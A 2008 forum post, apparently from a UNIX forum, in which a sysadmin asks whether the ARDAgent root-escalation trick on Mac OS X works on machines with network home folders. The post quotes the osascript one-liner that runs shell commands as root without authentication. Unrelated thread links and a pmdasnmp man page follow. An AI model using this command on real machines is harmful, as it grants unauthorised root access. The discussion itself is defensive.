ARD Agent vulnerability Post: 302207304

Sponsored Content

Operating Systems OS X (Apple) ARD Agent vulnerability Post 302207304 by afriend on Thursday 19th of June 2008 02:05:31 PM

06-19-2008

Registered User

ARD Agent vulnerability

today an anonymous slashdot user posted this little shell command, that uses the ARDAgent to gain root access, without ever needing to authenticate.

the script is:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

Can be used to things like:
osascript -e 'tell app "ARDAgent" to do shell script "scutil --set ComputerName SomeName"'
that would normally require authentication.

It has been tested by quite a few people, and has been found only to work you are physically at a computer and its logged in.

However where I work we use Network Shares as our home folder, and this hack doesnt seem to work. And I just wanted to make sure that there was no way it would work.

When I run the command:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

I get:
execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)

Anyone thinks its possible?

afriend

View Public Profile for afriend

Find all posts by afriend

5 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

Solaris agent

Hello, on Solaris 5.8 I've installed SunMgtCenter to get the time agent; it's under /opt/SUNWsymon/sbin/es-start -a it's in ps -ef | grep agent ...but it doesn't work; the machine is always in alarm cause the time is different of the clock server; is it clear enough ? tks cc

2. IP Networking

SNMP agent

Hi, I am really new in linux and SNMP. I have a SNMP agent in Linux (net-snmp). I have my MIB in the /usr/share/mibs directory, and I didn't manage to understand where and how do I put the values of the fields in the MIB? The values are static, so the agent need to return the same value in...

3. UNIX for Dummies Questions & Answers

perform agent

Hi, Please can someone explain me about the " perform agent " on UNIX . Thanx

4. UNIX for Dummies Questions & Answers

vcs agent

Hi all, I'm new to vcs. I have a doubt. I need to know, what will happen if an agent is stopped while reources being online. Eg.. while the oracle agent is stopped, will all the oracle resources will become offline.. Advanced thanks

5. Solaris

OV Server on 11 - need to install agent?

Client has got a few machines with logical domains on. But I can't see the the ovs-agent service? Quite possibly I guess this has been set up with just logical domains. With no agent. Do you need to use the agent only if planning to manage with OV Manager?

LEARN ABOUT CENTOS

pmdasnmp

PMDASNMP(1)						       Performance Co-Pilot						       PMDASNMP(1)

NAME

       pmdasnmp - Gateway from SNMP to PCP (PMDA)

DESCRIPTION

       pmdasnmp is a Performance Metrics Domain Agent (PMDA) which provides a generic gateway from PCP queries from a PCP client to SNMP queries
       to one or more SNMP agents.

INSTALLATION

       If you want access to the SNMP gateway performance metrics, do the following as root:

	       # cd $PCP_PMDAS_DIR/snmp
	       # ./Install

       If you want to undo the installation, do the following as root:

	       # cd $PCP_PMDAS_DIR/snmp
	       # ./Remove

       pmdasnmp is launched by pmcd(1) and should never be executed directly.  The Install and Remove scripts notify pmcd(1) when the agent is
       installed or removed.

CONFIGURATION

       TODO: define config file format here - map/set/host/... etc

FILES

       $PCP_PMDAS_DIR/snmp/snmp.conf
	   optional configuration file for pmdasnmp

       $PCP_PMDAS_DIR/snmp/Install
	   installation script for the pmdasnmp agent

       $PCP_PMDAS_DIR/snmp/Remove
	   undo installation script for the pmdasnmp agent

       $PCP_LOG_DIR/pmcd/snmp.log
	   default log file for error and warn() messages from pmdasnmp

SEE ALSO

       pmcd(1) and SNMP

3.8.10							       Performance Co-Pilot						       PMDASNMP(1)